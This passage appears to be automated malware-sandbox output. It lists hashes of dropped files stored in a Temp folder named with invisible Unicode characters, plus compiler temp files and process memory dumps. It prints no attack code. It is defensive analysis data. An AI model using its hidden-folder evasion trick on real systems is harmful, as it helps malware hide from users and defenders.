2f063bdf8befaa520b1cc603a699efd178750633aa121e598d60cae5aeebc0a844ee1ab206fb2f3779f8b67055430c07c5310ff0a4e50a39da99f9da6492ede7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Desktop\UnpublishUpdate.mp4

Filesize
639KB

MD5
8ebeff39b68fcf9a678a95322c6fca39

SHA1
05e1efb10d45ddfa9bf0500c1a7c488149f1be57

SHA256
14535f2b66e4611364f3dc069e9437fd8bd0a0b635886281a5ed7ce573f83e97

SHA512
b6c056db255f075fe3b17df85bb5b1887aba8c8fdabcec324d62788ccb86e7f44aef1e9bc447b36485466d3bbdfde9b6f202d3db22db7b13aca4c431aaba5f29

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Documents\UnprotectImport.doc

Filesize
473KB

MD5
bc8af8874f015d251b98393d3166b430

SHA1
73ce2281038fc1c9ea556ec3ee6fed87da2a4873

SHA256
ce1795479840955b7d0a0ef09a1a74cd2d72c3dc091f130f86ef769baa2b3b2f

SHA512
e09028badb6efc535745b5d38f49e56304617400a36f30a8647bebcaab17e3511e53b16aa4be55a49980d539442a0cd7413c1275f24fd1fa8c1024f5627e2801

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\ConvertFromSet.xls

Filesize
531KB

MD5
7d8ef867c1efe0f7a901037c6e9f03cb

SHA1
36a45c60c404974ec6130fb4a9a3463a2235ddb6

SHA256
8d5d7208dd2517123d6d48e06afdaadf88966f3d2b39824f9b7381038db83989

SHA512
c69ec65312d2e796e24c110e33e30280a0535aa88974f091d4d8de1407deee3fa16807e9c11f78063e6d3b6f04bf062903a607c23a32e29d4c2e51dcd0473e2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\ExitPublish.mp4

Filesize
572KB

MD5
7f346b1da35505c1750034350f75df58

SHA1
73b9d27e86f729c913e84989ed5e2edeab853518

SHA256
5844d1ebfd393338c50569372f79fd8b817ce3e853ea10003d068d85188b9dba

SHA512
bfd8fba11a7879d5c197e498dff74753e49edcc1ba47fc1add7b26748e1ad500735f085513f8d9d5b35212edea38e7c7c0ac43c90f27ec341b57b97399824a0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\HideWrite.png

Filesize
599KB

MD5
2436f16ab1719b005ed2cf450db50afd

SHA1
1d51b9e2de8d7425849272e4af9febd0fbddff5a

SHA256
589b818c3058d674f274bf8c83f2fd1c5e9a3b6853ac609aa142fe667ca93170

SHA512
8a3fe5df6dc0caef8d8784397f9e765bc5386564f1958663693250e0b7b59fb1bfc5746ece71589c69ac8286676835422e26df598d4445e870be91943e90f055

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\ReadUnlock.jpeg

Filesize
760KB

MD5
267da1229a29b451f38e2a7c8dedf539

SHA1
63351fc01c01b47751765a642f6f64fadfd8eaa2

SHA256
4d8b428a25508ead8363fe0968ad3afef767d66c85219f238c24970f893b99e1

SHA512
34085c5b56aacaf97eaa920f553a41cd1477041b7c6f3a6d680d95f50f0494c2212f259bd7c907ddb269c4eed89840c44082db2625b38582e6fe09090c6f2ad0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\RegisterRename.jpg

Filesize
302KB

MD5
87efbef090bbd0950980a4951b1e4811

SHA1
fcc6ae0e915e7f987b2d7925287470702d38969f

SHA256
a5d25e2f72f6b30d6db4a1d668f611ebf44c7e22f44672b38cc444dd8ce4705c

SHA512
18fcc43a4cc34ad7d8ce67d0c22a4823bafb6fb9ed05c498acd8e69504d369b4619fc97fc56658ac5d2d0f0abb1550f832a989130cc56020996c73f55b4a41e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\ShowStep.png

Filesize
545KB

MD5
da852724ff88a4d153390162536b8465

SHA1
61432924a624b049e57f645cbfab68625abfdafd

SHA256
a7de8b6fed22e6d311242c8f769051874cb257a01a61e63630275be7252b5e6b

SHA512
43b5498497d9ad69d0921871aeb8b935e769c378f35e042c408e3c832d603c08ace21225ede2f8659b0065005bddb28577a44b0065366c4a67eb15770207ce6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Downloads\UnpublishMove.txt

Filesize
478KB

MD5
7d6e7fa803ef9b7e8fa494eb3be6d243

SHA1
9ee20a8dcbecadb2a8eedb0f063e71da13ce6abf

SHA256
e7652f53928acb2410c40eaf9bf652338c692140ecfc8bd9007a8811243d1b2e

SHA512
9a0f40eb8c44cf63de2056167d19d4b83a8c2528eec3c4336bf34fbf051c913780a7d9390b449d50719d45adb6321880409f5edb697fad81cc8d1801e404fe7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎   \Common Files\Pictures\BackupUnprotect.cr2

Filesize
901KB

MD5
7252bfad6a57f680a1281b2755ac22d6

SHA1
ea99c67f37ff61678db1e2c503e290b8037572d3

SHA256
4097ad894e34802881b944f17a5b61303ac2401346dfbdcc8dc99d4200935205

SHA512
e6a652d171bfcec7a263d97d2ec16dca174a2a5f82f1b364371faf05a2e4d2e72f2cdf7d9a2c31252423b2e3812c17b0397b6d9b4d322449e2d9764669d045a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zd12dtzf\CSC4C171EE646C94BCCB0FA23FD14E9196C.TMP

Filesize
652B

MD5
0c2587ddc4ed4f0f8858e51a889c6043

SHA1
0ab7029aed77e2c8a3b2c27e45bb4e359022b371

SHA256
2f06183e10c68878822603d10bc2076e86f166f7a7b29a98d274b2fe5a0862ae

SHA512
24acbcf8d4114fe542a308c28870c241dc8d26ef8c4308a2c8321609d648ccc831916087c068324b2e607e15bc41b3037e64c431929669a025e15a5319b2a522

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zd12dtzf\zd12dtzf.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zd12dtzf\zd12dtzf.cmdline

Filesize
607B

MD5
ddc46e2235b2b68ded95b1316cd164d7

SHA1
c93f69837efbf22c1332ecc8784ff48778aa13df

SHA256
7f541f37a9e333000d4f997f61126ee6ee5517bd0b29b00668e2663e224d907a

SHA512
c5dbfa12d1933453b56e1650a9b16dbfa42b159162e09b1fa47ae3bb17d8c64bb87c7fa4a4a1ddfbdfbb55a1337c8aeafc90c3f6973d2aaed17166b9212175d2

Download Submit
memory/1240-29-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp

Filesize
140KB

Download
memory/1240-329-0x00007FF8BD570000-0x00007FF8BD589000-memory.dmp

Filesize
100KB

Download
memory/1240-322-0x00007FF8B8320000-0x00007FF8B8334000-memory.dmp

Filesize
80KB

Download
memory/1240-78-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp

Filesize
180KB

Download
memory/1240-79-0x00007FF8C09F0000-0x00007FF8C09FD000-memory.dmp

Filesize
52KB

Download
memory/1240-81-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp

Filesize
1.1MB

Download
memory/1240-182-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp

Filesize
1.4MB

Download
memory/1240-71-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp

Filesize
736KB

Download
memory/1240-236-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp

Filesize
100KB

Download
memory/1240-239-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp

Filesize
52KB

Download
memory/1240-72-0x0000027B27880000-0x0000027B27BF5000-memory.dmp

Filesize
3.5MB

Download
memory/1240-73-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp

Filesize
3.5MB

Download
memory/1240-74-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp

Filesize
140KB

Download
memory/1240-70-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp

Filesize
5.9MB

Download
memory/1240-66-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp

Filesize
184KB

Download
memory/1240-62-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp

Filesize
100KB

Download
memory/1240-64-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp

Filesize
52KB

Download
memory/1240-60-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp

Filesize
1.4MB

Download
memory/1240-58-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp

Filesize
140KB

Download
memory/1240-56-0x00007FF8BD570000-0x00007FF8BD589000-memory.dmp

Filesize
100KB

Download
memory/1240-54-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp

Filesize
180KB

Download
memory/1240-48-0x00007FF8C1520000-0x00007FF8C152F000-memory.dmp

Filesize
60KB

Download
memory/1240-137-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp

Filesize
140KB

Download
memory/1240-25-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp

Filesize
5.9MB

Download
memory/1240-323-0x00007FF8C09F0000-0x00007FF8C09FD000-memory.dmp

Filesize
52KB

Download
memory/1240-267-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp

Filesize
736KB

Download
memory/1240-256-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp

Filesize
184KB

Download
memory/1240-268-0x0000027B27880000-0x0000027B27BF5000-memory.dmp

Filesize
3.5MB

Download
memory/1240-279-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp

Filesize
3.5MB

Download
memory/1240-281-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp

Filesize
140KB

Download
memory/1240-294-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp

Filesize
1.1MB

Download
memory/1240-286-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp

Filesize
1.4MB

Download
memory/1240-280-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp

Filesize
5.9MB

Download
memory/1240-324-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp

Filesize
1.1MB

Download
memory/1240-330-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp

Filesize
140KB

Download
memory/1240-336-0x0000027B27880000-0x0000027B27BF5000-memory.dmp

Filesize
3.5MB

Download
memory/1240-335-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp

Filesize
736KB

Download
memory/1240-334-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp

Filesize
184KB

Download
memory/1240-333-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp

Filesize
52KB

Download
memory/1240-332-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp

Filesize
100KB

Download
memory/1240-331-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp

Filesize
1.4MB

Download
memory/1240-76-0x00007FF8B8320000-0x00007FF8B8334000-memory.dmp

Filesize
80KB

Download
memory/1240-328-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp

Filesize
180KB

Download
memory/1240-327-0x00007FF8C1520000-0x00007FF8C152F000-memory.dmp

Filesize
60KB

Download
memory/1240-326-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp

Filesize
140KB

Download
memory/1240-325-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp

Filesize
3.5MB

Download
memory/1240-310-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp

Filesize
5.9MB

Download
memory/1372-87-0x000001FAA5A40000-0x000001FAA5A62000-memory.dmp

Filesize
136KB

Download
memory/5116-168-0x0000021F5B990000-0x0000021F5B998000-memory.dmp

Filesize
32KB

Download